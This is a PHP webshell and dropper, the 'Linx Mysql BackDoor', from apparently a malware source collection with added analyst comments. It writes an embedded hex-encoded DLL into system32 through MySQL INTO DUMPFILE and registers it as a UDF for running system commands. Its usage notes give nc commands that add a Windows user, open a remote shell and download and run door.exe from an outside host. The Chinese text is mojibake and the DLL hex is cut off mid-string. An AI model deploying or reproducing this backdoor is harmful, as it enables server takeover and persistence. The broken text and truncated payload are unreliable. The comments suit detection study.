MalwareSourceCode/PHP/Trojan-Dropper.PHP.Agent.a

<?
//Linx Mysql BackDoor
//linyujian@bjfu.edu.cn
//2007.2.9
/*
<!--
Linx Mysql Door
Mysql BackDoor<6F><72>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>PHP+Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD>,<2C>ú<EFBFBD><C3BA>Ű<EFBFBD>װ<EFBFBD><D7B0>ΪMysql<71><6C><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"state"<22><><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dll<6C><6C><EFBFBD><EFBFBD>̽<EFBFBD>ͺ<EFBFBD><CDBA><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Windows<77><73>ӵ<EFBFBD><D3B5><EFBFBD><EFBFBD>Mysqlһ<6C><D2BB><EFBFBD><EFBFBD>ϵͳȨ<CDB3><C8A8>,<2C>Ӷ<EFBFBD><D3B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʵ<EFBFBD><CAB5><EFBFBD><EFBFBD><EFBFBD>޶˿<DEB6>,<2C>޽<EFBFBD><DEBD><EFBFBD>,<2C>޷<EFBFBD><DEB7><EFBFBD><EFBFBD>Ĵ<EFBFBD>ǽľ<C7BD><C4BE>.
<EFBFBD>÷<EFBFBD>
<EFBFBD><EFBFBD>Mysql.php<68><70><EFBFBD><EFBFBD>PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD>"<22>Զ<EFBFBD><D4B6><EFBFBD>װMysql BackDoor",
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
[ʹ<>û<EFBFBD><C3BB><EFBFBD>Sniff<66>ĺ<EFBFBD><C4BA><EFBFBD>]
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ŵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿ڷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"Mysql-"(ע<><D7A2><EFBFBD><EFBFBD>Сд)<29><>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>:
1.<2E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: nc ip 80->Mysql-cmd /c net user abc /add>c:/log.txt! (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"!"<22><><EFBFBD><EFBFBD>ʡ<EFBFBD><CAA1>)
2.<2E>÷<EFBFBD><C3B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Shell<6C><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD>20082<38>˿<EFBFBD>:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>nc <20>Clp 20082,<2C><>nc ip 80->Mysql-c- (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"-"<22><><EFBFBD><EFBFBD>ʡ<EFBFBD><CAA1>)
3.<2E>÷<EFBFBD><C3B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>:nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe!
ע<EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB>̽<EFBFBD><CCBD>"Mysql-"<22><>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>ռ<EFBFBD>и<EFBFBD><D0B8>ٵ<EFBFBD>ϵͳ<CFB5><CDB3>Դ.
-->
*/
// Installer stage. Everything below runs on every request; the actual
// install branch is gated only on a request variable named "install".
// Analyst note: all error output is suppressed, so a failed install leaves
// nothing in the PHP error log except what die() prints to the response.
error_reporting(0);
// extract() copies every POST and GET key into the local symbol table. Any
// variable used below ($install, $mysql_passwd, $dir, $dllname, $time, ...)
// can therefore be pre-set by the request; the only ones given fallback
// values are the four that follow.
extract($_POST);
extract($_GET);
$action="mysql"; // assigned but never read in this file
// Defaults: local MySQL as root, database "mysql". The default SQL calls the
// UDF "state" that the install branch registers below.
$mysql_hostname=$mysql_hostname?$mysql_hostname:"127.0.0.1";
$mysql_username=$mysql_username?$mysql_username:"root";
$post_sql=$post_sql?$post_sql:"select state(\"net user\")";
$mysql_dbname=$mysql_dbname?$mysql_dbname:"mysql";
if($install){
// mysql_* functions were removed in PHP 7; this code only runs on PHP 5.x
// or earlier. $mysql_passwd has no default and comes straight from extract().
$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
mysql_select_db($mysql_dbname,$link) or die(mysql_error());
// Classic UDF-drop sequence: a scratch table holding a BLOB, the DLL bytes
// inserted as a hex literal, then SELECT ... INTO DUMPFILE to write the file
// under the MySQL server's own OS privileges. Detection: a table named
// udf_temp, INTO DUMPFILE targeting system32, and CREATE FUNCTION ... SONAME
// in the general/binary log or in mysql.func. Mitigation: run mysqld as a
// low-privilege account and set secure_file_priv so DUMPFILE cannot reach
// system directories.
@mysql_query("DROP TABLE udf_temp", $link);
//@mysql_query("drop function state", $link);
$query="CREATE TABLE udf_temp (udf BLOB);";
if(!($result=mysql_query($query, $link)))
die('<27><><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>udf_temp<6D><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'.mysql_error());
else
{
// get_code() (defined later in the file) returns the DLL as a "0x..." hex
// string; CONVERT(...,CHAR) turns the hex literal into a binary string.
$code=get_code();
$query="INSERT into udf_temp values (CONVERT($code,CHAR));";
if(!mysql_query($query, $link))
{
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
die('<27><><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>DLL<4C><4C><EFBFBD>ݳ<EFBFBD><DDB3><EFBFBD><EFBFBD><EFBFBD>'.mysql_error());
}
else
{
// Target path is chosen from the web server's view of the filesystem, i.e.
// this assumes PHP and MySQL run on the same Windows host. The doubled
// backslashes survive PHP parsing as "\\" so that the MySQL string literal
// below unescapes them to single backslashes. If neither directory exists,
// $dir is never assigned here and keeps whatever extract() supplied.
$dllname="mysqlDll.dll";
if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll";
// Re-installs do not overwrite: a timestamp suffix is appended, so a host
// may carry several mysqlDll_<epoch>.dll copies (useful as a forensic
// timeline of install attempts).
if(file_exists($dir)) {
$time=time();
$dir=str_replace("mysqlDll","mysqlDll_$time",$dir);
$dllname=str_replace("mysqlDll","mysqlDll_$time",$dllname);
}
$query="SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
//echo $query;
if(!mysql_query($query, $link))
{
// Note the scratch table is deliberately left behind on this failure path
// (the DROP is commented out), which is itself an artifact to look for.
//mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
die("<22><><EFBFBD><EFBFBD>DLL<4C>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD>޻<EFBFBD><DEBB><EFBFBD> $dir <20>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>ڡ<EFBFBD>".mysql_error());
}
else
{
echo 'DLL<4C>ѳɹ<D1B3><C9B9>ĵ<EFBFBD><C4B5><EFBFBD><EFBFBD><EFBFBD>'.$dir.'<br>';
}
}
// Cleanup of the staging table, then registration of the UDF. $dllname is
// a bare file name: MySQL resolves SONAME relative to its plugin/system
// library search path, which is why the file was dropped into system32.
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
$result=mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
if($result) {
echo "MysqlDoor<6F><72>װ<EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD><br><a href='?'><3E><><EFBFBD><EFBFBD></a>";
exit();
}
}
}
?>
<meta http-equiv="content-type" content="text/html;charset=gb2312">
<title>Linx Mysql Door</title>
<form method="post" action="<?echo $HTTP_SERVER_VARS['php_self'];?>?">
Host: <input name="mysql_hostname" value="<?echo $mysql_hostname;?>" type="text" class="input" size="15" >
User: <input name="mysql_username" value="<?echo $mysql_username;?>" type="text" class="input" size="10" >
Password: <input type="password" name="mysql_passwd" value="<?echo $mysql_passwd;?>" class="input" size="10" >
DB: <input name="mysql_dbname" value="<?echo $mysql_dbname;?>" type="text" class="input" size="10" >
&nbsp;&nbsp;<input name="install" type="submit" value="<22>Զ<EFBFBD><D4B6><EFBFBD>װMysql BackDoor">
<br>
<br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>SQL<EFBFBD><EFBFBD><EFBFBD><br>
<textarea name="post_sql" cols="50" rows="8"><?echo stripslashes($post_sql);?>
</textarea>
<br> <br>
<input name="" type="submit" value="ִ<><D6B4>SQL<51><4C><EFBFBD><EFBFBD>">
</form><br><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><CFA2>
<?
// Query stage: runs whatever SQL was posted and prints the rows. Because
// extract() earlier copied GET/POST into $post_sql, the statement executed
// is not necessarily the $_POST value tested here. $_POST[post_sql] uses an
// unquoted constant name (notice-level in PHP 5, fatal in PHP 8), which
// error_reporting(0) hides.
if ($_POST[post_sql]) {
$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
if($mysql_dbname) mysql_select_db($mysql_dbname,$link) or die(mysql_error());
// stripslashes() undoes magic_quotes escaping; the SQL is otherwise passed
// through verbatim, so the MySQL general log is the place to see exactly
// what an operator ran through this page.
$query=stripslashes($post_sql);
$result = mysql_query($query, $link) or die(mysql_error());
?>
<br>
<textarea name="post_sql" cols="80" rows="15">
<?
// The false branch of this ternary is unreachable: a failed query already
// called die() above. $result is a resource (or true for non-SELECT
// statements), so the interpolated value is only a resource id.
echo ($result) ? "SQL<51><4C><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>ִ<EFBFBD><D6B4>:$result\n\n" : "<22><><EFBFBD><EFBFBD>:$result\n\n ".mysql_error();
// For non-SELECT statements $result is a boolean and mysql_fetch_array()
// would warn; the @ keeps that quiet and the loop simply does not run.
while ($row = @mysql_fetch_array ($result)) {
print_r ($row);
}
//mysql_free_result($result);
}
?>
</textarea>
<?
function get_code() {
return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058
210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9
B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E
}
?>
<pre>
-Linx Mysql BackDoor
-2007.6.9
<EFBFBD><EFBFBD>дMysql<EFBFBD>Ĺ<EFBFBD><EFBFBD><EFBFBD>Ա<EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD>"<22>Զ<EFBFBD><D4B6><EFBFBD>װMysqlDoor"<22><>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"state"<22><><EFBFBD><EFBFBD>,ͬʱ<CDAC><CAB1><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD><D0BB><EFBFBD><EFBFBD><EFBFBD>̽<EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ο<EFBFBD><EFBFBD><EFBFBD><!--<2D><>װ<EFBFBD><D7B0>Create Function state returns string soname 'mysqlDll.dll';-->
ִ<>У<EFBFBD>select state("net user");
ж<>أ<EFBFBD>drop function state;
ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"drop function state;"<22><><EFBFBD><EFBFBD>ʹmysql<71>˳<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
nc ip 80->Mysql-c- (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>20082<38>˿<EFBFBD>)
nc ip 80->Mysql-cmd /c net user abc /add>c:/log.txt!
nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe!
ע<EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB>̽<EFBFBD><CCBD>"Mysql-"<22><>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>ռ<EFBFBD>и<EFBFBD><D0B8>ٵ<EFBFBD>ϵͳ<CFB5><CDB3>Դ.
</pre>